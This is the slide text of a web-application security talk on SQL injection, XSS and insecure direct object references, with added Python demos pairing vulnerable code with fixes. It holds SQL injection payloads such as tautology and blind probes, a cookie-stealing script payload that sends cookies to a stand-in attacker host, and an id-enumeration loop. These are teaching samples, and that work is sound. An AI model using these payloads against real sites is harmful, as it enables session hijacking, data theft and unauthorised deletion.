Web Application Security: Be Offensive!



Eric Johnson, Cypress Data Defense

About Me
Eric Johnson (Twitter: @emjohn20)
Senior Security Consultant
SANS AppSec Curriculum Product Manager
Certified SANS Instructor & Course Author
Certifications: CISSP, GWAPT, GSSP-.NET, GSSP-Java

Be Offensive!
A good offense creates a business case for spending time and money on defense.

Attack Techniques
OWASP Top 10 (www.owasp.org)
A1: Injection
A3: Cross-Site Scripting
A4: Insecure Direct Object Reference

Disclaimer
Demonstrations of real attack tools. It is illegal to attack targets without written contractual consent. Obey your federal laws. We assume no liability.

A1 Injection
SQL Injection, LDAP Injection, Command Injection

A1 Injection: In The News (1)
May 2015: Gaana music service, 12.5 million records: name, email, MD5 password hash, DoB, social media handles

A1 Injection: In The News (2)
October 2013: 677,000 accounts: name, address, DOB, phone numbers, passwords

A1 Injection: In The News (3)
June 2012: 6.5 million password hashes extracted from the database; 4+ million of the SHA1 hashes were cracked within a few days

A1 Injection: In The News (4)
August 2009: 130 million credit card numbers; $200 million loss

A1 Injection: Exploitation
sqlmap demo: http://sqlmap.org/ (written in Python)

A1 Injection: Defenses
OWASP SQL Injection Prevention Cheat Sheet: https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
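The two slides above name the tool and the cheat sheet but show neither the flaw nor the fix. The following is an added example, not code from the talk or from sqlmap: a login query built by string formatting beside the parameterized version the cheat sheet recommends, run against an in-memory SQLite table. The table, the user rows and the payloads are constructed for the demo; the "blind_true"/"blind_false" pair illustrates the boolean-based differential that sqlmap automates when no error or data is reflected directly.

```python
import sqlite3

# Constructed sample data for the demo (not a real user table).
USERS = [
    ("alice", "hash-alice"),
    ("bob", "hash-bob"),
    ("carol", "hash-carol"),
]


def make_db() -> sqlite3.Connection:
    """In-memory SQLite database so the example runs offline."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, pw_hash TEXT)"
    )
    conn.executemany("INSERT INTO users (username, pw_hash) VALUES (?, ?)", USERS)
    return conn


def login_vulnerable(conn, username, pw_hash):
    """The 'before' code: values are pasted into the SQL text, so anything
    the user types is parsed as SQL rather than treated as data."""
    sql = (
        "SELECT id, username FROM users WHERE username = '%s' AND pw_hash = '%s'"
        % (username, pw_hash)
    )
    return conn.execute(sql).fetchall()


def login_safe(conn, username, pw_hash):
    """Parameterized query (the cheat sheet's primary defense): the driver
    binds the values, so quotes and keywords in the input match literally."""
    sql = "SELECT id, username FROM users WHERE username = ? AND pw_hash = ?"
    return conn.execute(sql, (username, pw_hash)).fetchall()


def demo():
    conn = make_db()
    # Tautology payload: closes the string literal, adds an always-true
    # clause, and comments out the password check with '--'.
    tautology = "' OR 1=1 --"
    return {
        "vulnerable": login_vulnerable(conn, tautology, "wrong"),
        "safe": login_safe(conn, tautology, "wrong"),
        "legit": login_safe(conn, "alice", "hash-alice"),
        # Boolean-based blind probing, the differential sqlmap automates:
        # the same input with a true vs. a false condition yields different
        # responses only if the injection point is live.
        "blind_true": login_vulnerable(conn, "alice' AND 1=1 --", "wrong"),
        "blind_false": login_vulnerable(conn, "alice' AND 1=2 --", "wrong"),
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(f"{name:12s} -> {rows}")
```

The vulnerable path returns every row for the tautology and a different result set for the true and false probes; the parameterized path returns nothing for the payload and only alice's row for the real credentials. The same binding applies to LDAP and OS command injection in spirit: keep the untrusted value out of the parsed text.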

A3 Cross-Site Scripting (XSS)
XSS flaws occur whenever an application takes untrusted data and sends it to a web browser without proper encoding. An attacker can execute scripts in the victim's browser, hijack user sessions, deface web sites, or redirect the user to malicious sites.

A3 XSS: In The News (1)
August 2009

A3 XSS: In The News (2)
March 2008: site defaced to contain flashing images designed to cause seizures; some victims required hospital care

A3 XSS: In The News (3)
June 2009: a company offered a $10,000 reward to anyone who broke into the CEO's email account; the email interface was vulnerable to XSS and session hijacking

A3 XSS: Exploitation
Browser Exploitation Framework (BeEF): http://beefproject.com/ (written in Ruby)

A3 XSS: Defenses
OWASP XSS Prevention Cheat Sheet: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet
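The XSS slides define the flaw as sending untrusted data to the browser "without proper encoding"; the cheat sheet's point is that the right encoder depends on where in the page the data lands. The following is an added example, not code from the talk, BeEF or OWASP: a welcome page rendered first by concatenation and then with one encoder for the HTML body and attribute contexts and another for a JavaScript string literal. The payload and the attacker host are constructed for the demo.

```python
import html
import json

# Constructed payload for the demo: a cookie-stealing script of the kind a
# BeEF-style hook would deliver (attacker.example is hypothetical).
PAYLOAD = "<script>location='http://attacker.example/?c='+document.cookie</script>"


def render_vulnerable(name: str) -> str:
    """The 'before' code: untrusted data concatenated straight into HTML."""
    return "<p>Welcome, " + name + "</p>"


def html_encode(value: str) -> str:
    """HTML body and quoted-attribute context: with quote=True, html.escape
    encodes the ampersand, both angle brackets and both quote characters,
    so the browser sees text rather than markup."""
    return html.escape(value, quote=True)


def js_string_encode(value: str) -> str:
    """JavaScript string-literal context. json.dumps escapes quotes and
    backslashes and, with its default ensure_ascii=True, U+2028/U+2029;
    on top of that, hex-escape < and > so a '</script>' inside the value
    cannot terminate the surrounding script element."""
    return json.dumps(value).replace("<", "\\u003c").replace(">", "\\u003e")


def render_safe(name: str) -> str:
    """Each sink uses the encoder for its own context."""
    return (
        "<p>Welcome, " + html_encode(name) + "</p>\n"
        '<input type="text" value="' + html_encode(name) + '">\n'
        "<script>var user = " + js_string_encode(name) + ";</script>"
    )


if __name__ == "__main__":
    print(render_vulnerable(PAYLOAD))
    print(render_safe(PAYLOAD))
```

Note what the two encoders do not cover: an untrusted value placed in a URL attribute (href, src) or a CSS property needs yet another encoder, and HTML-encoding a value that is then dropped into a script block does not stop the script context from executing it. Marking the session cookie HttpOnly does not fix the XSS but removes document.cookie from the payload's reach, which is why it belongs alongside encoding.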

A4 Insecure Direct Object Reference
Accessing backend data using untrusted request parameters, i.e. data attackers can manipulate: a file, a directory, a database key.

A4: In The News (1)
April 2015: site allowed any user to delete any video via the event_id request parameter; bug bounty paid $5,000

A4: In The News (2)
October 2013: site allowed users to download other customers' SMS message history; phone number in the query string

A4: In The News (3)
September 2013: site allowed users to delete another user's photos via the profile id and photo id request parameters; bug bounty paid $12,500

A4: Exploitation
Burp Suite Intruder (Free and Professional editions): http://portswigger.net (written in Java)

A4: Mitigations
OWASP Access Control Cheat Sheet: https://www.owasp.org/index.php/Access_Control_Cheat_Sheet
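The "delete any video via event_id" case above is the whole of the flaw: the handler trusts the key in the request. The following is an added example, not code from the talk, the affected site or Burp Suite: a delete handler with no ownership check, the same handler with the check the Access Control Cheat Sheet calls for, an indirect per-user reference map as a second layer, and a loop that does what Burp Intruder does when it walks a range of ids. The video store, user names and id range are constructed for the demo.

```python
import secrets

# Constructed store: video id -> owning user.
VIDEOS = {101: "alice", 102: "alice", 103: "bob"}


class Forbidden(Exception):
    """Raised when a request must be refused; caller maps it to 403/404."""


def delete_video_vulnerable(store, current_user, event_id):
    """Before: any authenticated user can delete any video by guessing the id
    (current_user is never consulted)."""
    store.pop(event_id)
    return True


def delete_video_checked(store, current_user, event_id):
    """Fix 1: enforce ownership on every access to the direct key."""
    owner = store.get(event_id)
    if owner is None or owner != current_user:
        # One response for 'no such id' and 'not yours', so the id space
        # cannot be enumerated through the error message.
        raise Forbidden("not found or not permitted")
    store.pop(event_id)
    return True


class ReferenceMap:
    """Fix 2: per-user indirect references. The client only ever sees random
    tokens that the server maps back to the real keys for that user."""

    def __init__(self):
        self._maps = {}  # user -> {token: real_id}

    def expose(self, user, real_id):
        token = secrets.token_urlsafe(12)
        self._maps.setdefault(user, {})[token] = real_id
        return token

    def resolve(self, user, token):
        try:
            return self._maps[user][token]
        except KeyError:
            raise Forbidden("unknown reference") from None


def delete_video_indirect(store, refmap, current_user, token):
    real_id = refmap.resolve(current_user, token)
    # Still check ownership of the resolved key: the map narrows what a
    # user can name, the check decides what they may do.
    return delete_video_checked(store, current_user, real_id)


def enumerate_ids(store, user, candidates, handler):
    """What Intruder automates: try every candidate id as the given user and
    record which ones the handler accepts. Each try works on a copy."""
    hits = []
    for cid in candidates:
        trial = dict(store)
        try:
            handler(trial, user, cid)
            hits.append(cid)
        except (Forbidden, KeyError):
            pass
    return hits


def demo():
    results = {}
    s = dict(VIDEOS)
    delete_video_vulnerable(s, "bob", 101)  # bob deletes alice's video
    results["vulnerable_deleted_alice_video"] = 101 not in s

    s = dict(VIDEOS)
    try:
        delete_video_checked(s, "bob", 101)
        results["checked_blocked"] = False
    except Forbidden:
        results["checked_blocked"] = 101 in s
    results["checked_owner_ok"] = delete_video_checked(s, "alice", 101) and 101 not in s

    s = dict(VIDEOS)
    rm = ReferenceMap()
    alice_token = rm.expose("alice", 102)
    try:
        delete_video_indirect(s, rm, "bob", alice_token)  # token issued to alice
        results["indirect_blocked"] = False
    except Forbidden:
        results["indirect_blocked"] = 102 in s
    results["indirect_owner_ok"] = (
        delete_video_indirect(s, rm, "alice", alice_token) and 102 not in s
    )
    return results


if __name__ == "__main__":
    print(demo())
    print("bob vs vulnerable:", enumerate_ids(VIDEOS, "bob", range(100, 110), delete_video_vulnerable))
    print("bob vs checked:   ", enumerate_ids(VIDEOS, "bob", range(100, 110), delete_video_checked))
```

Run as bob, the enumeration hits all three videos against the unchecked handler and only bob's own against the checked one; that difference in hit count is exactly the signal an Intruder sweep surfaces. The same pattern covers the SMS-history and photo-deletion cases: the phone number or profile id in the request is a direct reference, and the fix is the ownership check, not a more obscure parameter name.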

Who is at risk?
Does your company store sensitive information? Are you storing payment card information? Does your company store health care records? Are you compliant with federal and state laws? Do you work with companies or third-party vendors that store this type of information?
Oftentimes it comes down to one main issue: WE DON'T KNOW. And if there is uncertainty within our own company, the risk only increases as you work with vendors and third parties.

Security Training, Security Reviews
"Help me, Obi-Wan Kenobi. You're my only hope."

Security Assessment Options
Review types: Static Review, Manual Review, Hybrid Review
Features: Static Application Security Testing (SAST), Manual Code Review, Manual Dynamic Testing, Dynamic Application Security Testing (DAST), Results Validation, Application Security Assessment Report, Remediation Training & Consulting
Our team can conduct the assessment remotely in a safe and secure environment, or we can come directly to the facility and conduct the review on site.

Thank You! Questions?
@emjohn20
eric.johnson@cypressdefense.com